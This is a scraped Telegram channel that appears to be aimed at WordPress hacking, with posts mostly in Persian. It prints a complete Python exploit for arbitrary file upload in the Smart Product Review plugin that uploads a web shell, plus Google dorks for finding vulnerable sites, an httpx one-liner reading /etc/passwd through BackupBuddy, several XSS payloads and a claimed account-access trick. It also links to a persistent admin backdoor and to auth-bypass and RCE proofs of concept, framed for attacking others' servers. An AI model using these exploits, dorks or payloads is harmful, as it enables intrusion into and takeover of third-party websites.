0Day.Today | Learn Exploit | Zero World | Dark web |
14.2K subscribers
1.11K photos
76 videos
462 files
1.09K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
آموزش بروت فورس وردپرس با ابزار WpScan در کالی لینوکس

#bruteforce #terminal #kali #tools #wordpress

AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress

آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4

جهت مشاهده ی دمو بزنید.

دورک و تحلیل اسکریپت تو پست بعدی


IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress

آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.


#Google~Dork:
inurl: /wp-content/plugins/smart-product-review/


#Download~Script:
Download

خب بریم ببینیم این اسکریپت چطوری کار میکنه :

خب داره اینجا لایبرری ها رو‌اضافه میکنه

import os.path
from os import path
import json
import requests
import time
import sys



نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")

def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")



خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text

if ("No script kiddies please!!" in raw):
return False;
else:
return True;


انجام امورات مهم :) اینجا صورت گرفته :
def main():

banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho


base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )

بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';


uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check

بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)

if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)




اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )

files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}


print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )

تو خط بالایی داره دیتا هارو میفرسته



بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه

file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)

main();

خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو


IR0Day.Today Boy's
@LearnExploit
@TechArmy
چندین آسیب پذیری از جمله CVE-2021-25049 و CVE-2021-24865 در پلاگین های Wordpress امکان حمله Xss , SQL Injection , Csrf و ... را برای مهاجم فراهم می کند .

پیشنهاد میشه یوزر ها سریعا اقدام به نصب پچ های امنیتی بکنند .

شناسه آسیب پذیری ها :

CVE-2021-25049
CVE-2021-25062
CVE-2021-25073
CVE-2021-24423
CVE-2021-24906
CVE-2021-25017
CVE-2021-24865
CVE-2021-24858

منبع : Wpscan

#Wpscan #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
Wordpress vuln , CVE

plugin: backupbuddy

cat hosts |httpx -title -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"

#wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
Collection of Wordpress Exploits and CVES.

Github

#Wordpress #Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Wordpress - XSS ( CVE-2022-29455)

/wp-content/plugins/elementor/assets/js/frontend.min.js

usage:

https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==

#wordpress #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Exploiting the xmlrpc.php on all WordPress versions

Read Here

#Exploit #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
در نسخه جدید پلاگین ژاکت:
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1

پیلود تست شده :
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

پیلود تست شده :
https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E

بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1

#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
wordpress login page allow un-auth cross site scripting (xss)

Payload :

%22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f

#xss #wordpress
——————‌
0Day.Today
@LearnExploit
@Tech_Army
WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability

Nuclei template:
Github

Payload : https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c

#Wordpress #0day #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-2982

WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass

Github

#bypass #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln

Dork :
inurl: wp-content/plugins/jupiterx-core/

Shared By XP4

IR0Day.Today Bax
@LearnExploit
@Tech_Army
CVE-2023-38389-@LearnExploit.rar
726.6 KB
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln

Dork :
inurl: wp-content/plugins/jupiterx-core/

نکته: با پایتون 2.7 اجرا کنید در غیر این صورت با اررور مواجه میشید.

Shared By XP4

IR0Day.Today Bax
@LearnExploit
@Tech_Army
CVE-2023-37988 - Wordpress/Plugin - Contact Form Generator [RXSS]

Github

#CVE #Wordpress #RXSS
——————‌
0Day.Today
@LearnExploit
@Tech_Army
بکدور ساخت یوزر ادمین با دسترسی دائم

Link File

#backdoor #wordpress

imem!

——————‌
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations

POC

Read

#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8

Query Fofa: body="/wp-content/themes/bricks/"

POC

Nuclei

#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army